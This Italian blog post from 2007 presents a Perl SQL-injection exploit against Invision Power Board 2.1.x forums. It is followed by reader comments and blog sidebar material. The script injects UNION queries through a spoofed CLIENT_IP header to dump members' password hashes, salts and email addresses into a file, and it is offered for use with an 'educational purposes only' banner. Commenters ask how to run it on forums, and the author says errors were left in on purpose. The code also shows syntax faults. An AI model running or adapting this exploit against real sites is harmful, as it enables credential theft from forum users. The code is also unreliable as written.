Invision Power Board SQL Injenction Exploit 2.1 -> 2.1.6

Precedentemente avevo scritto un articolo su un Exploit in perl che sfruttava una SQL Injection su un Invison Power Board <=2.0.3, andate a rivedere l’articolo, il funzionamento è identico al precendete exploit, non dovete specificare il numero di versione del Forum perchè si tratta della stessa serie!😉

Eccovi il codice:

#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
&header()
if (@ARGV < 2) {&info() exit()}
$server = $ARGV[0];
$dir = $ARGV[1];
print "
SERVER {$server}\r\n";
print "
DIR {$dir}\r\n";
#Step 1, detecting vulnerability
print "[1] Testing forum vulnerability...";
$q = "UNION SELECT 'VULN',1,1,1/*";
query($q,$server,$dir)
if($rep =~/VULN/){ print "forum vulnerable\r\n"; }
else
{
print "forum unvulnerable\r\n";
&footer()
exit()
}
#Step 2, detecting prefix
print "[2] Searching prefix...";
$q = "";
query($q,$server,$dir)
$prefix = $rep;
print $prefix."\r\n";
#Step 3, make query
print "[3] Performing query; it may take several minutes, plz, wait...\r\n";
$q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*";
query($q1,$server,$dir)
$kol = $rep;
open(RES,">".$server."_result.txt")
for($id = 1; $id <= $kol; $id++)
{
$own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
query($own_query,$server,$dir)
if($rep=~/[0-9a-f]{32}/i)
{
$hash = $rep;
$own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
query($own_query,$server,$dir)
if(length($rep)==5)
{
$salt = $rep;
$own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
query($own_query,$server,$dir)
if(length($rep)>0)
{
$email = $rep;
print RES $id.":".$hash.":".$salt."::".$email."\n";
}
}
}
}
close(RES)
print "[!] Query was successfully perfomed. Results are in txt files\r\n";
&footer()
$ex = ;
sub footer()
{
print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";
}
sub header()
{
print q(
----------------------------------------------------------
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
* Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *
* Coded by w4g.not null *
* FOR EDUCATIONAL PURPOSES *ONLY* *
----------------------------------------------------------
)
}
sub info()
{
print q(
Usage: perl w4gipb216.pl [server] [/dir/]
where
|- server - server, where IPB installed without http://
|- /dir/ - dir, where IPB installed or / for no dir
e.g perl w4gipb216.pl someserver.com /forum/
Stealing info about users (format id:pass:salt::email)
[!] Need MySQL > 4.0
)
}
sub query()
{
my($q,$server,$dir) = @_;
$res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q)
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
else
{
if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }
}
}
return $rep;
}

Buon Testing!😉

8 Responses to “Invision Power Board SQL Injenction Exploit 2.1 -> 2.1.6”


  1. 1 CandyShopGirl 9, ottobre, 2007 alle 9:33 am

    Hi!

    What do you think about Tokio Hotel? >:)

  2. 2 Checco 64 10, ottobre, 2007 alle 6:26 pm

    Ciao! Posso chiederti una cosa? Allora, questo exploit dovrebbe funzionare per tutte le versioni dei forum IBP (quindi Forumfree ad esempio) superiori alla 2.1 e inferiori alla 2.6 (queste due comprese). Adesso, se faccio partire l’exploit, mi dà errore! Esattamente nella linea 5, presso “> {”
    Ora, io in Perl non sono un genio (anzi, non sò un H!) quindi ti chiedo se potevi controllare il tuo exploit e dirmi se le tesi del mio errore sono fondate. Premetto che non voglio usare questo exploit per defacciare forum, mi interesa capire come funzionano tutti sti passaggi complessi (anche se molti pensano il contrario…) infatti faccio le prove sui miei forum, con due miei account.
    Ora, indipendentemente da questo, mi chiedevo se potevi aiutarmi!
    Grazie in anticipo!

  3. 3 underground0 11, ottobre, 2007 alle 12:44 pm

    Ciao, l’exploit contiene degli errori in modo da non consentire l’uso
    sconsiderato al lamer di turno! Per quanto riguarda FF ti posso dire che questo exploit non funziona per certo! ^_^
    Byez😀

  4. 4 BreaveagCargy 23, ottobre, 2007 alle 7:52 am

    Hello!,

    I’m just starting here. And it feels like an awesome forum.

    I just wanted to give a nice “how’s it going” to all of you here.
    🙂

    -Felix

  5. 5 Francesco 12, novembre, 2007 alle 9:56 pm

    ———————————————————-
    * Invision Power Board 2.1.* Remote SQL Injecton Exploit *
    * Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *
    * Coded by w4g.not null *
    * FOR EDUCATIONAL PURPOSES *ONLY* *
    ———————————————————-
    [+] SERVER {http://www…..com/}
    [+] DIR {/forum/}
    [1] Testing forum vulnerability…forum unvulnerable
    [G] Greets: 1dt.w0lf (rst/ghc)
    [L] Visit: secbun.info | damagelab.org |
    rst.void.ru

    Ora che e vulnerabile come lo sfrutto?

  6. 6 Federco 8, marzo, 2008 alle 6:27 pm

    MA quale vulnerabile
    Non leggi
    Unvlunerable..
    Praticamente te la prendi nel secchio.
    Studia l inglese prima di lamerare.

  7. 7 proscarman 12, marzo, 2008 alle 2:18 am

    folks have where I be allowed to posses some Proscar ?


  1. 1 jouer au poker comme débutant Trackback su 29, maggio, 2008 alle 5:28 am
Comments are currently closed.



Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,049,926 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

luglio: 2007
L M M G V S D
« Giu   Set »
 1
2345678
9101112131415
16171819202122
23242526272829
3031